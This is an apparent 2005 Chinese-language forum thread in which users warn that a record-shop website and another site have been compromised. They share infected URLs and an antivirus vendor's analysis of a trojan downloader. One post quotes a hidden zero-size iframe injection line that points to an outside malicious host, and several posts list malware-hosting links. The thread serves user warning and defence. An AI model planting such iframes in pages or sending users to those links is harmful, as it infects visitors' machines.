-
唱片行網站有病毒!?
[COLOR=Red]by admin : 以下的連結可能內含病毒或木馬等惡意程式
未更新病毒碼或非必要請勿任意點選 , 以免中鏢[/COLOR]
""http://www.tcr.com.tw/showartist2.asp?art=喬山波""
想試試的自已連好了。比較安全。以免去按到。
我在上面的唱片行"[url]http://www.tcr.com.tw/[/url]"查cd專輯(old places old faces),查看它以前的所有專輯時(最上面的網址),出現了天堂的木馬,這不會是誤判吧!
[IMG]http://img171.exs.cx/img171/788/clipboard10cx.jpg[/IMG]
-
呃~ 我的防毒軟體沒反應耶 :eye:
不確定有沒有..但是印象中..這網站之前有被入侵過.....
記得當時版上還有人貼出來過....
所以..還是小心點囉 :(
先來去換個防毒軟體好了>_<
-
有的網站會被植入惡意的木馬程式 , 當使用者瀏覽網頁時就會被自動載入
可以 email 請該網站的管理員注意此事並處理
-
有毒
[img]http://www.imagevenue.com/loc141/206_d99.png[/img]
-
[QUOTE=zame123]
我在上面的唱片行"[url]http://www.tcr.com.tw/[/url]"查cd專輯(old places old faces),查看它以前的所有專輯時(最上面的網址),出現了天堂的木馬,這不會是誤判吧!
[/QUOTE]
不是誤判,這跟之前的 W32.LOCKED.B 等等都是一樣的手法。
把網站殖入 <iframe width=0 height=0 src=*****.htm></iframe>
的語法,你的瀏覽器就不知不覺...嘿嘿嘿,更巧的是毒不一樣,位置不一樣檔案名稱還一樣是bbs003302.css。
最近還真流行呀。 :|||:
聽說之前 RO 的網站也中了...(我是沒找到啦)。
-
嗯~ 果然有問題...但是我的防毒好像都沒動作 = =" (KAV、Notorn)
網頁的iframe會導到 http://www.twavgirl.com/count/count.htm
裡面就是有問題網頁了..
不知是否開了就中毒? :eye:
先來去找解毒了 :(
-
[QUOTE=inutoneko]不是誤判,這跟之前的 W32.LOCKED.B 等等都是一樣的手法。
把網站殖入 <iframe width=0 height=0 src=*****.htm></iframe>
的語法,你的瀏覽器就不知不覺...嘿嘿嘿,更巧的是毒不一樣,位置不一樣檔案名稱還一樣是bbs003302.css。
最近還真流行呀。 :|||:
聽說之前 RO 的網站也中了...(我是沒找到啦)。[/QUOTE]
是喔。最近流行啊。
真是太可怕啦。
好在有下載最新的mcafee附加病毒庫,不然可能也抓不到吧! :eek:
-
nod32連進去無反應
慘了 恐怕要去解毒了@@"
沒發現任何異狀 會不會是什麼東西擋下來了 :corkysm:
-
太晚了,那時已經點下去了。看起來什麼事情都沒有發生,宛如正常的網頁。
-
Firefox瀏覽器1.0與F-Secure Anti-Virus Client Security version 5.55無反應 :(
-
真正的位置在這邊....
請自行複製點選連結
"http://4764467445.b108.zgsj.com/count.htm"
-
用 FireFox 不需要擔心啦。
用戶端的應該是利用這個漏洞的。
[url]http://www.microsoft.com/taiwan/security/bulletin/MS05-001.mspx[/url]
Microsoft 安全性公告 MS05-001
HTML Help 說明檔的弱點可能會允許程式碼執行 (890175)
記得去修補 IE 漏洞。
另外,好心一點的就寫 email 去告訴它們網站客服人員,或去留言版留個言提醒一下吧。
最近已經碰過不少的 MS IIS + ASP 站台都中毒中木馬到不知不覺了。
PS: 用 FireFox 的,你會在頁面左上角看到一個奇怪的符號跟數字 1 之類的。那個就是隱藏的病毒網頁 count.htm 執行後的結果。用IE的看不到。
-
KB890175就算是有安裝了SP2也是要更新喔! :)
-
-
今天微軟更新了2月份的patch後不知道這個漏洞解掉沒?
-
[QUOTE=yuping]今天微軟更新了2月份的patch後不知道這個漏洞解掉沒?[/QUOTE]
好像沒有。我是不是中毒了啊。 :|||:
[IMG]http://img213.exs.cx/img213/9092/200502100gq.jpg[/IMG]
-
F-Secure Corporation 的回答
==================================
Thanks for your report. We have checked the website and found a CHM
file that
drops a trojan downloader. This trojan downloader hiddenly downloads
and run
another executable file which is detected as follows:
--------------------------------------------------------------
Scanning Report
10 February 2005 15:50:02 - 15:50:09
Target: C:\1
Result: 1 virus found
* C:\1\setup.ex Infection: Trojan-PSW.Win32.Lineage.ah Action:
Renamed.
--------------------------------------------------------------
We will file the abuse report about the download site and add detection
for
the trojan downloader.
Regards,
-
-
[url]http://www.papago.com.tw/[/url]
這個網站似乎也被植入木馬
進去討論區KAV就跳出了
-----
原始碼怎麼看不到它插入的CSS?
-
2 個附加檔案
[QUOTE=darren2000][url]http://www.papago.com.tw/[/url]
這個網站似乎也被植入木馬
進去討論區KAV就跳出了
-----
原始碼怎麼看不到它插入的CSS?[/QUOTE]
沒錯!http://www.mactiontech.com/big5/board/board.asp
程式碼<iframe width=0 height=0 src=http://www.szadk.com/new.htm></iframe>
kav偵測為 new.htm - infected by Exploit.VBS.Phel.c
-
喔喔!下載附件後。
我的mcafee 8.0i (patch10)抓不到。
還是要去網站才抓的到呢?
有人有用mcafee嗎?